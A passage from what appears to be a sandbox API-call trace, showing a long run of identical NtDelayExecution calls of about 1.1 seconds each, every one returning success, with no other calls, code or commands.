(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.949] NtDelayExecution 